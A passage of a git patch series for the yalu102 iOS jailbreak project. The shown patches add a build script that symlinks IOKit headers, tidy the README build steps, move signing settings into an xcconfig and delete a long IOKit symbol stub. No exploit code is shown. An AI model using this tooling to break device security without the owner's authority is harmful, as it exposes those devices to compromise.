From edf0859b33010194d0d5a0cd98d98d491285c0e4 Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sat, 28 Jan 2017 14:51:36 +0100 Subject: [PATCH 01/34] Find IOKit headers automatically --- yalu102.xcodeproj/project.pbxproj | 27 +++++++++++++++++++++++++++ yalu102/include/.gitignore | 2 ++ yalu102/include/README.md | 3 +++ 3 files changed, 32 insertions(+) create mode 100644 yalu102/include/.gitignore create mode 100644 yalu102/include/README.md diff --git a/yalu102.xcodeproj/project.pbxproj b/yalu102.xcodeproj/project.pbxproj index 70c54fe..2609da2 100644 --- a/yalu102.xcodeproj/project.pbxproj +++ b/yalu102.xcodeproj/project.pbxproj @@ -150,6 +150,7 @@ isa = PBXNativeTarget; buildConfigurationList = EA9900FA1E1E9F060056FEBD /* Build configuration list for PBXNativeTarget "yalu102" */; buildPhases = ( + A72976DF1E3CD3E10011A922 /* Create IOKit symlink */, EA9900DF1E1E9F060056FEBD /* Sources */, EA9900E01E1E9F060056FEBD /* Frameworks */, EA9900E11E1E9F060056FEBD /* Resources */, @@ -231,6 +232,24 @@ }; /* End PBXResourcesBuildPhase section */ +/* Begin PBXShellScriptBuildPhase section */ + A72976DF1E3CD3E10011A922 /* Create IOKit symlink */ = { + isa = PBXShellScriptBuildPhase; + buildActionMask = 2147483647; + files = ( + ); + inputPaths = ( + ); + name = "Create IOKit symlink"; + outputPaths = ( + ); + runOnlyForDeploymentPostprocessing = 0; + shellPath = /bin/sh; + shellScript = "DESTPATH=\"$PROJECT_DIR/yalu102/include\"\nMACOSSDK=$PLATFORM_DIR/../MacOSX.platform/Developer/SDKs/MacOSX.sdk\nset -e\n[ ! -e \"$DESTPATH/IOKit\" ] && ln -s \"$MACOSSDK/System/Library/Frameworks/IOKit.framework/Headers\" \"$DESTPATH/IOKit\"\n[ ! -e \"$DESTPATH/libkern\" ] && ln -s \"$MACOSSDK/usr/include/libkern\" \"$DESTPATH/libkern\"\n"; + showEnvVarsInLog = 0; + }; +/* End PBXShellScriptBuildPhase section */ + /* Begin PBXSourcesBuildPhase section */ EA9900DF1E1E9F060056FEBD /* Sources */ = { isa = PBXSourcesBuildPhase; @@ -370,6 +389,10 @@ ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; CLANG_ENABLE_OBJC_ARC = NO; DEVELOPMENT_TEAM = CGTX3WH3ZS; + HEADER_SEARCH_PATHS = ( + "$(inherited)", + "$(PROJECT_DIR)/yalu102/include", + ); INFOPLIST_FILE = yalu102/Info.plist; LD_RUNPATH_SEARCH_PATHS = "$(inherited) @executable_path/Frameworks"; LIBRARY_SEARCH_PATHS = ( @@ -389,6 +412,10 @@ ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; CLANG_ENABLE_OBJC_ARC = NO; DEVELOPMENT_TEAM = CGTX3WH3ZS; + HEADER_SEARCH_PATHS = ( + "$(inherited)", + "$(PROJECT_DIR)/yalu102/include", + ); INFOPLIST_FILE = yalu102/Info.plist; LD_RUNPATH_SEARCH_PATHS = "$(inherited) @executable_path/Frameworks"; LIBRARY_SEARCH_PATHS = ( diff --git a/yalu102/include/.gitignore b/yalu102/include/.gitignore new file mode 100644 index 0000000..fc59920 --- /dev/null +++ b/yalu102/include/.gitignore @@ -0,0 +1,2 @@ +IOKit +libkern diff --git a/yalu102/include/README.md b/yalu102/include/README.md new file mode 100644 index 0000000..24ec1a4 --- /dev/null +++ b/yalu102/include/README.md @@ -0,0 +1,3 @@ +IOKit's `Headers` directory from macOS 10.12 is expected to be found here, named `IOKit`. Dependencies of IOKit (namely libkern) should also be made available through this directory. + +The Xcode project will automatically all required symlinks when compiling, but you're free to place your own directories here. They will be left alone. From fff1a902350194a24c8aef913f6de64f68a95796 Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sat, 28 Jan 2017 14:54:42 +0100 Subject: [PATCH 02/34] Update README.md --- README.md | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/README.md b/README.md index 53a68ba..73bd1db 100644 --- a/README.md +++ b/README.md @@ -38,8 +38,7 @@ If you are already on iOS 10.2 with an iPhone 7, **stay there**. The actual expl 1. `git clone` the repo. 2. Open the repo in Xcode 3. Change the bundle ID, as shown [here](https://www.reddit.com/r/sideloaded/wiki/how-to-sideload#wiki_changing_the_bundle_identifier_and_team) -4. Include the IOKit headers, and add them to your search path. -5. Run the project. +4. Run the project. ## Installing From f34ec9f945c0be5ba5873b937bc2e50c6972ea8e Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sat, 28 Jan 2017 15:09:42 +0100 Subject: [PATCH 03/34] Update README.md --- yalu102/include/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yalu102/include/README.md b/yalu102/include/README.md index 24ec1a4..8eaf44f 100644 --- a/yalu102/include/README.md +++ b/yalu102/include/README.md @@ -1,3 +1,3 @@ -IOKit's `Headers` directory from macOS 10.12 is expected to be found here, named `IOKit`. Dependencies of IOKit (namely libkern) should also be made available through this directory. +IOKit's `Headers` directory from the macOS SDK is expected to be found here, named `IOKit`. Dependencies of IOKit (namely libkern) should also be made available through this directory. -The Xcode project will automatically all required symlinks when compiling, but you're free to place your own directories here. They will be left alone. +The Xcode project will automatically create all required symlinks when compiling, but you're free to place your own directories here. They will be left alone. From c9d2626c7ea4f65014427de86ad15547107f9184 Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sat, 28 Jan 2017 16:20:01 +0100 Subject: [PATCH 04/34] Fix IOKit symlink script return code --- yalu102.xcodeproj/project.pbxproj | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/yalu102.xcodeproj/project.pbxproj b/yalu102.xcodeproj/project.pbxproj index 2609da2..815b12f 100644 --- a/yalu102.xcodeproj/project.pbxproj +++ b/yalu102.xcodeproj/project.pbxproj @@ -245,8 +245,7 @@ ); runOnlyForDeploymentPostprocessing = 0; shellPath = /bin/sh; - shellScript = "DESTPATH=\"$PROJECT_DIR/yalu102/include\"\nMACOSSDK=$PLATFORM_DIR/../MacOSX.platform/Developer/SDKs/MacOSX.sdk\nset -e\n[ ! -e \"$DESTPATH/IOKit\" ] && ln -s \"$MACOSSDK/System/Library/Frameworks/IOKit.framework/Headers\" \"$DESTPATH/IOKit\"\n[ ! -e \"$DESTPATH/libkern\" ] && ln -s \"$MACOSSDK/usr/include/libkern\" \"$DESTPATH/libkern\"\n"; - showEnvVarsInLog = 0; + shellScript = "set -x\nset -e\nDESTPATH=\"$PROJECT_DIR/yalu102/include\"\nMACOSSDK=\"$PLATFORM_DIR/../MacOSX.platform/Developer/SDKs/MacOSX.sdk\"\nif [ ! -e \"$DESTPATH/IOKit\" ]; then\n ln -s \"$MACOSSDK/System/Library/Frameworks/IOKit.framework/Headers\" \"$DESTPATH/IOKit\"\nfi\nif [ ! -e \"$DESTPATH/libkern\" ]; then\n ln -s \"$MACOSSDK/usr/include/libkern\" \"$DESTPATH/libkern\"\nfi\n"; }; /* End PBXShellScriptBuildPhase section */ From cce9b5a7cf764b757eccb6448df764b1416d94dc Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sat, 28 Jan 2017 17:52:00 +0100 Subject: [PATCH 05/34] Reorganize Xcode project Remove IOKit.tbd and use the one shipped in the iOS SDK instead; move bootstrap files to Resources directory; move code signing settings to separate Xcode config file for the sake of keeping git diffs clean. --- yalu102.xcconfig | 4 + yalu102.xcodeproj/project.pbxproj | 96 ++- yalu102/IOKit.tbd | 852 ------------------------- yalu102/{ => Resources}/0.reload.plist | 0 yalu102/{ => Resources}/bootstrap.tar | Bin yalu102/{ => Resources}/launchctl | Bin yalu102/{ => Resources}/reload | 0 yalu102/{ => Resources}/tar | Bin 8 files changed, 40 insertions(+), 912 deletions(-) create mode 100644 yalu102.xcconfig delete mode 100644 yalu102/IOKit.tbd rename yalu102/{ => Resources}/0.reload.plist (100%) rename yalu102/{ => Resources}/bootstrap.tar (100%) rename yalu102/{ => Resources}/launchctl (100%) rename yalu102/{ => Resources}/reload (100%) rename yalu102/{ => Resources}/tar (100%) mode change 100644 => 100755 diff --git a/yalu102.xcconfig b/yalu102.xcconfig new file mode 100644 index 0000000..e5a83d4 --- /dev/null +++ b/yalu102.xcconfig @@ -0,0 +1,4 @@ +// Enter your custom team ID and bundle ID here. +// Do not commit the results into the git repository. +DEVELOPMENT_TEAM = CGTX3WH3ZS; +PRODUCT_BUNDLE_IDENTIFIER = kim.cracksby.yalu102; diff --git a/yalu102.xcodeproj/project.pbxproj b/yalu102.xcodeproj/project.pbxproj index 815b12f..556e418 100644 --- a/yalu102.xcodeproj/project.pbxproj +++ b/yalu102.xcodeproj/project.pbxproj @@ -7,6 +7,7 @@ objects = { /* Begin PBXBuildFile section */ + A72023721E3CFC2B00FADBFF /* IOKit.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = A72023711E3CFBCA00FADBFF /* IOKit.framework */; }; EA1A3B9D1E391C4F009CA025 /* patchfinder64.o in Frameworks */ = {isa = PBXBuildFile; fileRef = EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */; }; EA1A3BA81E398E33009CA025 /* 0.reload.plist in Resources */ = {isa = PBXBuildFile; fileRef = EA1A3BA61E398E33009CA025 /* 0.reload.plist */; }; EA1A3BAD1E399006009CA025 /* reload in Resources */ = {isa = PBXBuildFile; fileRef = EA1A3BAC1E399006009CA025 /* reload */; }; @@ -21,25 +22,14 @@ EA99010A1E21A04C0056FEBD /* tar in Resources */ = {isa = PBXBuildFile; fileRef = EA9901091E21A04C0056FEBD /* tar */; }; EA99010C1E21A0520056FEBD /* launchctl in Resources */ = {isa = PBXBuildFile; fileRef = EA99010B1E21A0520056FEBD /* launchctl */; }; EA99010E1E21A1560056FEBD /* jailbreak.m in Sources */ = {isa = PBXBuildFile; fileRef = EA99010D1E21A1560056FEBD /* jailbreak.m */; }; - EA9901141E21A1B00056FEBD /* iokitmig64.o in Frameworks */ = {isa = PBXBuildFile; fileRef = EA9901131E21A1B00056FEBD /* iokitmig64.o */; }; EA9901171E21A1D90056FEBD /* devicesupport.m in Sources */ = {isa = PBXBuildFile; fileRef = EA9901161E21A1D90056FEBD /* devicesupport.m */; }; - EA9901191E21A2180056FEBD /* IOKit.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = EA9901181E21A2180056FEBD /* IOKit.tbd */; }; /* End PBXBuildFile section */ -/* Begin PBXContainerItemProxy section */ - EA1A3BA41E398E28009CA025 /* PBXContainerItemProxy */ = { - isa = PBXContainerItemProxy; - containerPortal = EA1A3BA01E398E28009CA025 /* mach_portal.xcodeproj */; - proxyType = 2; - remoteGlobalIDString = B0FB96FC1DEB2C8600C0D3C4; - remoteInfo = mach_portal; - }; -/* End PBXContainerItemProxy section */ - /* Begin PBXFileReference section */ + A72023711E3CFBCA00FADBFF /* IOKit.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = IOKit.framework; path = System/Library/Frameworks/IOKit.framework; sourceTree = SDKROOT; }; + A72023751E3CFE2E00FADBFF /* yalu102.xcconfig */ = {isa = PBXFileReference; lastKnownFileType = text.xcconfig; path = yalu102.xcconfig; sourceTree = ""; }; EA1A3B9B1E38BBDB009CA025 /* patchfinder64.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = patchfinder64.h; sourceTree = ""; }; EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.objfile"; path = patchfinder64.o; sourceTree = ""; }; - EA1A3BA01E398E28009CA025 /* mach_portal.xcodeproj */ = {isa = PBXFileReference; lastKnownFileType = "wrapper.pb-project"; name = mach_portal.xcodeproj; path = "../../Downloads/mach_portal_redist-1/mach_portal/mach_portal.xcodeproj"; sourceTree = ""; }; EA1A3BA61E398E33009CA025 /* 0.reload.plist */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.plist.xml; path = 0.reload.plist; sourceTree = ""; }; EA1A3BAC1E399006009CA025 /* reload */ = {isa = PBXFileReference; lastKnownFileType = text.script.sh; path = reload; sourceTree = ""; }; EA1A3BC41E39D1FF009CA025 /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = ""; }; @@ -59,10 +49,8 @@ EA99010B1E21A0520056FEBD /* launchctl */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; path = launchctl; sourceTree = ""; }; EA99010D1E21A1560056FEBD /* jailbreak.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = jailbreak.m; sourceTree = ""; }; EA99010F1E21A1A00056FEBD /* pte_stuff.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = pte_stuff.h; sourceTree = ""; }; - EA9901131E21A1B00056FEBD /* iokitmig64.o */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.objfile"; path = iokitmig64.o; sourceTree = ""; }; EA9901151E21A1D90056FEBD /* devicesupport.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = devicesupport.h; sourceTree = ""; }; EA9901161E21A1D90056FEBD /* devicesupport.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = devicesupport.m; sourceTree = ""; }; - EA9901181E21A2180056FEBD /* IOKit.tbd */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = "sourcecode.text-based-dylib-definition"; path = IOKit.tbd; sourceTree = ""; }; /* End PBXFileReference section */ /* Begin PBXFrameworksBuildPhase section */ @@ -70,27 +58,40 @@ isa = PBXFrameworksBuildPhase; buildActionMask = 2147483647; files = ( - EA9901141E21A1B00056FEBD /* iokitmig64.o in Frameworks */, EA1A3B9D1E391C4F009CA025 /* patchfinder64.o in Frameworks */, - EA9901191E21A2180056FEBD /* IOKit.tbd in Frameworks */, + A72023721E3CFC2B00FADBFF /* IOKit.framework in Frameworks */, ); runOnlyForDeploymentPostprocessing = 0; }; /* End PBXFrameworksBuildPhase section */ /* Begin PBXGroup section */ - EA1A3BA11E398E28009CA025 /* Products */ = { + A720236F1E3CFB3500FADBFF /* Resources */ = { isa = PBXGroup; children = ( - EA1A3BA51E398E28009CA025 /* mach_portal.app */, + EA1A3BA61E398E33009CA025 /* 0.reload.plist */, + EA9901051E219FF10056FEBD /* bootstrap.tar */, + EA99010B1E21A0520056FEBD /* launchctl */, + EA1A3BAC1E399006009CA025 /* reload */, + EA9901091E21A04C0056FEBD /* tar */, ); - name = Products; + path = Resources; + sourceTree = ""; + }; + A72023701E3CFBB900FADBFF /* Frameworks */ = { + isa = PBXGroup; + children = ( + A72023711E3CFBCA00FADBFF /* IOKit.framework */, + ); + name = Frameworks; sourceTree = ""; }; EA9900DA1E1E9F060056FEBD = { isa = PBXGroup; children = ( + A72023751E3CFE2E00FADBFF /* yalu102.xcconfig */, EA9900E51E1E9F060056FEBD /* yalu102 */, + A72023701E3CFBB900FADBFF /* Frameworks */, EA9900E41E1E9F060056FEBD /* Products */, ); sourceTree = ""; @@ -106,31 +107,24 @@ EA9900E51E1E9F060056FEBD /* yalu102 */ = { isa = PBXGroup; children = ( - EA1A3B9B1E38BBDB009CA025 /* patchfinder64.h */, - EA9901021E219C210056FEBD /* offsets.c */, - EA9901031E219C210056FEBD /* offsets.h */, - EA1A3BA01E398E28009CA025 /* mach_portal.xcodeproj */, - EA99010D1E21A1560056FEBD /* jailbreak.m */, + EA1A3BC41E39D1FF009CA025 /* Assets.xcassets */, + A720236F1E3CFB3500FADBFF /* Resources */, + EA9900E61E1E9F060056FEBD /* Supporting Files */, + EA9900F41E1E9F060056FEBD /* LaunchScreen.storyboard */, + EA9900EF1E1E9F060056FEBD /* Main.storyboard */, EA9900E91E1E9F060056FEBD /* AppDelegate.h */, - EA1A3BA61E398E33009CA025 /* 0.reload.plist */, - EA1A3BAC1E399006009CA025 /* reload */, EA9900EA1E1E9F060056FEBD /* AppDelegate.m */, - EA9900EC1E1E9F060056FEBD /* ViewController.h */, - EA9900ED1E1E9F060056FEBD /* ViewController.m */, - EA9900EF1E1E9F060056FEBD /* Main.storyboard */, - EA9900F41E1E9F060056FEBD /* LaunchScreen.storyboard */, + EA9901151E21A1D90056FEBD /* devicesupport.h */, + EA9901161E21A1D90056FEBD /* devicesupport.m */, EA9900F71E1E9F060056FEBD /* Info.plist */, - EA9901051E219FF10056FEBD /* bootstrap.tar */, - EA9901091E21A04C0056FEBD /* tar */, - EA99010B1E21A0520056FEBD /* launchctl */, - EA9901131E21A1B00056FEBD /* iokitmig64.o */, + EA99010D1E21A1560056FEBD /* jailbreak.m */, + EA9901021E219C210056FEBD /* offsets.c */, + EA9901031E219C210056FEBD /* offsets.h */, + EA1A3B9B1E38BBDB009CA025 /* patchfinder64.h */, EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */, EA99010F1E21A1A00056FEBD /* pte_stuff.h */, - EA1A3BC41E39D1FF009CA025 /* Assets.xcassets */, - EA9901181E21A2180056FEBD /* IOKit.tbd */, - EA9901151E21A1D90056FEBD /* devicesupport.h */, - EA9901161E21A1D90056FEBD /* devicesupport.m */, - EA9900E61E1E9F060056FEBD /* Supporting Files */, + EA9900EC1E1E9F060056FEBD /* ViewController.h */, + EA9900ED1E1E9F060056FEBD /* ViewController.m */, ); path = yalu102; sourceTree = ""; @@ -191,12 +185,6 @@ mainGroup = EA9900DA1E1E9F060056FEBD; productRefGroup = EA9900E41E1E9F060056FEBD /* Products */; projectDirPath = ""; - projectReferences = ( - { - ProductGroup = EA1A3BA11E398E28009CA025 /* Products */; - ProjectRef = EA1A3BA01E398E28009CA025 /* mach_portal.xcodeproj */; - }, - ); projectRoot = ""; targets = ( EA9900E21E1E9F060056FEBD /* yalu102 */, @@ -204,16 +192,6 @@ }; /* End PBXProject section */ -/* Begin PBXReferenceProxy section */ - EA1A3BA51E398E28009CA025 /* mach_portal.app */ = { - isa = PBXReferenceProxy; - fileType = wrapper.application; - path = mach_portal.app; - remoteRef = EA1A3BA41E398E28009CA025 /* PBXContainerItemProxy */; - sourceTree = BUILT_PRODUCTS_DIR; - }; -/* End PBXReferenceProxy section */ - /* Begin PBXResourcesBuildPhase section */ EA9900E11E1E9F060056FEBD /* Resources */ = { isa = PBXResourcesBuildPhase; @@ -287,6 +265,7 @@ /* Begin XCBuildConfiguration section */ EA9900F81E1E9F060056FEBD /* Debug */ = { isa = XCBuildConfiguration; + baseConfigurationReference = A72023751E3CFE2E00FADBFF /* yalu102.xcconfig */; buildSettings = { ALWAYS_SEARCH_USER_PATHS = NO; ARCHS = armv7; @@ -338,6 +317,7 @@ }; EA9900F91E1E9F060056FEBD /* Release */ = { isa = XCBuildConfiguration; + baseConfigurationReference = A72023751E3CFE2E00FADBFF /* yalu102.xcconfig */; buildSettings = { ALWAYS_SEARCH_USER_PATHS = NO; ARCHS = armv7; @@ -387,7 +367,6 @@ ARCHS = armv7; ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; CLANG_ENABLE_OBJC_ARC = NO; - DEVELOPMENT_TEAM = CGTX3WH3ZS; HEADER_SEARCH_PATHS = ( "$(inherited)", "$(PROJECT_DIR)/yalu102/include", @@ -398,7 +377,6 @@ "$(inherited)", "$(PROJECT_DIR)/yalu102", ); - PRODUCT_BUNDLE_IDENTIFIER = kim.cracksby.yalu102; PRODUCT_NAME = "$(TARGET_NAME)"; VALID_ARCHS = armv7; }; @@ -410,7 +388,6 @@ ARCHS = armv7; ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; CLANG_ENABLE_OBJC_ARC = NO; - DEVELOPMENT_TEAM = CGTX3WH3ZS; HEADER_SEARCH_PATHS = ( "$(inherited)", "$(PROJECT_DIR)/yalu102/include", @@ -421,7 +398,6 @@ "$(inherited)", "$(PROJECT_DIR)/yalu102", ); - PRODUCT_BUNDLE_IDENTIFIER = kim.cracksby.yalu102; PRODUCT_NAME = "$(TARGET_NAME)"; VALID_ARCHS = armv7; }; diff --git a/yalu102/IOKit.tbd b/yalu102/IOKit.tbd deleted file mode 100644 index f6b0829..0000000 --- a/yalu102/IOKit.tbd +++ /dev/null @@ -1,852 +0,0 @@ ---- -archs: [ armv7, armv7s, arm64, armv7k ] -platform: ios -install-name: /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit -current-version: 275.0 -exports: - - archs: [ armv7, armv7s, armv7k ] - symbols: [ _IOConnectMethodScalarIScalarO, _IOConnectMethodScalarIStructureI, - _IOConnectMethodScalarIStructureO, _IOConnectMethodStructureIStructureO, - _IOMapMemory, _io_async_method_scalarI_scalarO, - _io_async_method_scalarI_structureI, _io_async_method_scalarI_structureO, - _io_async_method_structureI_structureO, _io_catalog_get_data, - _io_catalog_get_gen_count, _io_catalog_module_loaded, - _io_catalog_reset, _io_catalog_send_data, _io_catalog_terminate, - _io_connect_add_client, _io_connect_async_method, - _io_connect_get_notification_semaphore, _io_connect_get_service, - _io_connect_map_memory, _io_connect_map_memory_into_task, - _io_connect_method, _io_connect_method_scalarI_scalarO, - _io_connect_method_scalarI_structureI, _io_connect_method_scalarI_structureO, - _io_connect_method_structureI_structureO, _io_connect_method_var_output, - _io_connect_set_notification_port, _io_connect_set_properties, - _io_connect_unmap_memory, _io_connect_unmap_memory_from_task, - _io_iterator_is_valid, _io_iterator_next, _io_iterator_reset, - _io_object_conforms_to, _io_object_get_bundle_identifier, - _io_object_get_class, _io_object_get_retain_count, - _io_object_get_superclass, _io_registry_create_iterator, - _io_registry_entry_create_iterator, _io_registry_entry_from_path, - _io_registry_entry_from_path_ool, _io_registry_entry_get_child_iterator, - _io_registry_entry_get_location_in_plane, _io_registry_entry_get_name, - _io_registry_entry_get_name_in_plane, _io_registry_entry_get_parent_iterator, - _io_registry_entry_get_path, _io_registry_entry_get_path_ool, - _io_registry_entry_get_properties, _io_registry_entry_get_properties_bin, - _io_registry_entry_get_property, _io_registry_entry_get_property_bin, - _io_registry_entry_get_property_bytes, _io_registry_entry_get_property_recursively, - _io_registry_entry_get_registry_entry_id, _io_registry_entry_in_plane, - _io_registry_entry_set_properties, _io_registry_get_root_entry, - _io_registry_iterator_enter_entry, _io_registry_iterator_exit_entry, - _io_server_version, _io_service_acknowledge_notification, - _io_service_add_interest_notification, _io_service_add_notification, - _io_service_add_notification_bin, _io_service_add_notification_ool, - _io_service_close, _io_service_get_authorization_id, - _io_service_get_busy_state, _io_service_get_matching_service, - _io_service_get_matching_service_bin, _io_service_get_matching_service_ool, - _io_service_get_matching_services, _io_service_get_matching_services_bin, - _io_service_get_matching_services_ool, _io_service_get_state, - _io_service_match_property_table, _io_service_match_property_table_bin, - _io_service_match_property_table_ool, _io_service_open_extended, - _io_service_request_probe, _io_service_set_authorization_id, - _io_service_wait_quiet ] - - archs: [ armv7, armv7s, arm64, armv7k ] - symbols: [ _IOAVAudioFormatTypeString, _IOAVAudioGetChannelAllocation, - _IOAVAudioGetChannelAllocationDefault, _IOAVAudioGetChannelLayoutData, - _IOAVAudioGetSpeakerAllocationMask, _IOAVAudioInterfaceCopyChannelLayoutElements, - _IOAVAudioInterfaceCopyDiagnosticsString, _IOAVAudioInterfaceCopyElements, - _IOAVAudioInterfaceCopyProperties, _IOAVAudioInterfaceCopyProperty, - _IOAVAudioInterfaceCreate, _IOAVAudioInterfaceCreateWithService, - _IOAVAudioInterfaceGetLinkData, _IOAVAudioInterfaceGetLinkDataWithSource, - _IOAVAudioInterfaceGetService, _IOAVAudioInterfaceGetTypeID, - _IOAVAudioInterfaceSetLogLevel, _IOAVAudioInterfaceSetLogLevelMask, - _IOAVAudioInterfaceSetProperty, _IOAVAudioInterfaceStartLink, - _IOAVAudioInterfaceStartLinkWithSource, _IOAVAudioInterfaceStopLink, - _IOAVAudioInterfaceStopLinkWithSource, _IOAVAudioSampleRate, - _IOAVAudioSampleRateScalar, _IOAVAudioSampleSize, - _IOAVAudioSpeakerString, _IOAVCommandString, _IOAVControlInterfaceCopyDiagnosticsString, - _IOAVControlInterfaceCopyProperties, _IOAVControlInterfaceCopyProperty, - _IOAVControlInterfaceCreate, _IOAVControlInterfaceCreateWithService, - _IOAVControlInterfaceGetService, _IOAVControlInterfaceGetTypeID, - _IOAVControlInterfaceSetLogLevel, _IOAVControlInterfaceSetLogLevelMask, - _IOAVControlInterfaceSetProperty, _IOAVControllerClearEventLog, - _IOAVControllerCopyDiagnosticsString, _IOAVControllerCopyProperties, - _IOAVControllerCopyProperty, _IOAVControllerCreate, - _IOAVControllerCreateWithLocation, _IOAVControllerCreateWithService, - _IOAVControllerForceHotPlugDetect, _IOAVControllerGetLocation, - _IOAVControllerGetPower, _IOAVControllerGetTypeID, - _IOAVControllerSetEventLogCommandMask, _IOAVControllerSetEventLogEventMask, - _IOAVControllerSetEventLogSize, _IOAVControllerSetLogLevel, - _IOAVControllerSetLogLevelMask, _IOAVControllerSetPower, - _IOAVControllerSetProperty, _IOAVControllerSetProtectionType, - _IOAVControllerSetQualityPattern, _IOAVCreateDiagnosticsReference, - _IOAVCreateDiagnosticsReferenceWithLocation, _IOAVCreateDiagnosticsString, - _IOAVCreateDiagnosticsStringWithLocation, _IOAVCreateStringWithAudioChannelLayoutData, - _IOAVCreateStringWithAudioLinkData, _IOAVCreateStringWithData, - _IOAVCreateStringWithElement, _IOAVCreateStringWithElements, - _IOAVCreateStringWithVideoColorData, _IOAVCreateStringWithVideoLinkData, - _IOAVCreateStringWithVideoTimingData, _IOAVDeviceClearEventLog, - _IOAVDeviceCopyDiagnosticsString, _IOAVDeviceCopyProperties, - _IOAVDeviceCopyProperty, _IOAVDeviceCreate, _IOAVDeviceCreateWithLocation, - _IOAVDeviceCreateWithService, _IOAVDeviceGetController, - _IOAVDeviceGetLinkData, _IOAVDeviceGetLocation, - _IOAVDeviceGetPower, _IOAVDeviceGetProtectionStatus, - _IOAVDeviceGetProtectionType, _IOAVDeviceGetTypeID, - _IOAVDeviceReadI2C, _IOAVDeviceSetEventLogCommandMask, - _IOAVDeviceSetEventLogEventMask, _IOAVDeviceSetEventLogSize, - _IOAVDeviceSetLogLevel, _IOAVDeviceSetLogLevelMask, - _IOAVDeviceSetPower, _IOAVDeviceSetProperty, _IOAVDeviceStartLink, - _IOAVDeviceStopLink, _IOAVDeviceWriteI2C, _IOAVEDIDIsStandard, - _IOAVElementTypeString, _IOAVEventLogEventTypeString, - _IOAVGetCEAVideoShortID, _IOAVGetCEAVideoShortIDWithData, - _IOAVGetCEAVideoShortIDWithDataActive, _IOAVGetCEAVideoTimingData, - _IOAVGetCEAVideoTimingDataWithShortID, _IOAVGetCVTVideoTimingData, - _IOAVGetDMTVideoTimingData, _IOAVGetGTFVideoTimingData, - _IOAVGetSPDInfoFrame, _IOAVGetSupportedVideoTimingDataList, - _IOAVGetTransportSupportsCEA, _IOAVGetTransportSupportsYCbCr, - _IOAVGetVideoTimingData, _IOAVGetVideoTimingITSource, - _IOAVHDMIAudioClockRegenerationDataForLink, _IOAVInfoFrameGetChecksum, - _IOAVInfoFrameTypeString, _IOAVLinkSourceString, - _IOAVLinkTypeString, _IOAVLocationString, _IOAVProtectionStatusString, - _IOAVProtectionTypeString, _IOAVRecoverableError, - _IOAVServiceClearEventLog, _IOAVServiceCopyDiagnosticsString, - _IOAVServiceCopyEDID, _IOAVServiceCopyProperties, - _IOAVServiceCopyProperty, _IOAVServiceCreate, _IOAVServiceCreateWithLocation, - _IOAVServiceCreateWithService, _IOAVServiceGetDevice, - _IOAVServiceGetLinkData, _IOAVServiceGetLinkDataWithSource, - _IOAVServiceGetPower, _IOAVServiceGetProtectionStatus, - _IOAVServiceGetProtectionType, _IOAVServiceGetTypeID, - _IOAVServiceSetEventLogCommandMask, _IOAVServiceSetEventLogEventMask, - _IOAVServiceSetEventLogSize, _IOAVServiceSetLogLevel, - _IOAVServiceSetLogLevelMask, _IOAVServiceSetPower, - _IOAVServiceSetProperty, _IOAVServiceSetVirtualEDIDMode, - _IOAVServiceStartInfoFrame, _IOAVServiceStartInfoFrameWithSource, - _IOAVServiceStartLink, _IOAVServiceStartLinkWithSource, - _IOAVServiceStopInfoFrame, _IOAVServiceStopInfoFrameWithSource, - _IOAVServiceStopLink, _IOAVServiceStopLinkWithSource, - _IOAVServiceSupportsLink, _IOAVStandardTypeString, - _IOAVSupportedVideoTimingDataListTypeString, _IOAVTransportString, - _IOAVVideoActiveFormatAspectRatio, _IOAVVideoAxisString, - _IOAVVideoColorBitDepth, _IOAVVideoColorBitDepthScalar, - _IOAVVideoColorCoefficientString, _IOAVVideoColorDynamicRangeString, - _IOAVVideoColorSpaceString, _IOAVVideoGetPixelClockTolerance, - _IOAVVideoInterfaceCopyColorElements, _IOAVVideoInterfaceCopyDiagnosticsString, - _IOAVVideoInterfaceCopyProperties, _IOAVVideoInterfaceCopyProperty, - _IOAVVideoInterfaceCopyTimingElements, _IOAVVideoInterfaceCreate, - _IOAVVideoInterfaceCreateWithLocation, _IOAVVideoInterfaceCreateWithService, - _IOAVVideoInterfaceGetLinkData, _IOAVVideoInterfaceGetLinkDataWithSource, - _IOAVVideoInterfaceGetService, _IOAVVideoInterfaceGetTypeID, - _IOAVVideoInterfaceSetBounds, _IOAVVideoInterfaceSetColorDitherRemoval, - _IOAVVideoInterfaceSetLogLevel, _IOAVVideoInterfaceSetLogLevelMask, - _IOAVVideoInterfaceSetProperty, _IOAVVideoInterfaceSetRotation, - _IOAVVideoInterfaceStartLink, _IOAVVideoInterfaceStartLinkWithSource, - _IOAVVideoInterfaceStopLink, _IOAVVideoInterfaceStopLinkWithSource, - _IOAVVideoLinkModeString, _IOAVVideoTimingCalculatedTypeString, - 